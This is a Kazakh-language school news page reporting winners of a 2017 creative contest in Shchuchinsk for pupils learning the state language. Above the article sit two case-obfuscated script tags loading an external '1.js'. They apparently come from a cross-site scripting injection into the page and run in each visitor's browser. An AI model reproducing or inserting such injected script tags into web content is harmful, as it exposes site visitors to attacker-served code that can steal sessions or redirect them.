<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.05.2017

   2017 жылдың 7 сәуір күні Щучинск қаласындағы №4 орта мектепте Мемлекеттік тілді үйреніп жатқан  өзге ұлт  өкілдерінің  арасында шығармашылық конкурс өткізілді.

  Шығармашылық конкурс 4 - кезеңнен тұрды. Олар:«Ұлттық қолданбалы өнер», «Музыкалық қонақжай», «Көркемдік театрландырылған қойылым» «Әдеби көркем оқу». Жалпы түрдегі мектеп - интернатынан 10 оқушы қатысты.

Номинациялар бойынша орындарға ие болғандары.

1. «Ұлттық қолданбалы өнер» номинациясы  бойынша 9-сынып оқушысы Ломакин Вячеслав 1 орынға ие болды.Мұғалімі: Омарова А.Н.

2. «Көркемдік театрландырылған қойылым»  номинациясы  бойынша 4-сынып оқушысы Гасников Александар 1 орынға ие болды. Мұғалімі:Камалиева А.А.

3. «Музыкалық қонақжай» номинациясы  бойынша 9- сынып оқушысы  Концевая Анастасия 3 орынға ие болды. Мұғалімі: Омарова А.Н.

4. «Көркемдік театрландырылған қойылым» номинациясы  бойынша 6- сынып оқушысы Алиев Бехруз 3 орынға ие болды. Мұғалімі: Омарова А.Н.

5. «Ұлттық қолданбалы өнер» номинациясы  бойынша 3 - сынып  оқушысы Гусев Никита 3 орынға ие болды. Мұғалімі:Камалиева А.А.

6. «Көркемдік театрландырылған қойылым» номинациясы  бойынша 8- сынып оқушысы Данилова Анастасия 3 орынға ие болды. Мұғалімі:Куржибаева Г.Х

7. «Әдеби көркем оқу» номинациясы  бойынша 4- сынып оқушысы  Арапиев Адам 3 орынға ие болды. Мұғалімі:Куржибаева Г.Х

Просмотров: 764


Пікір қосу



Деректерді қолтаңбаға қосу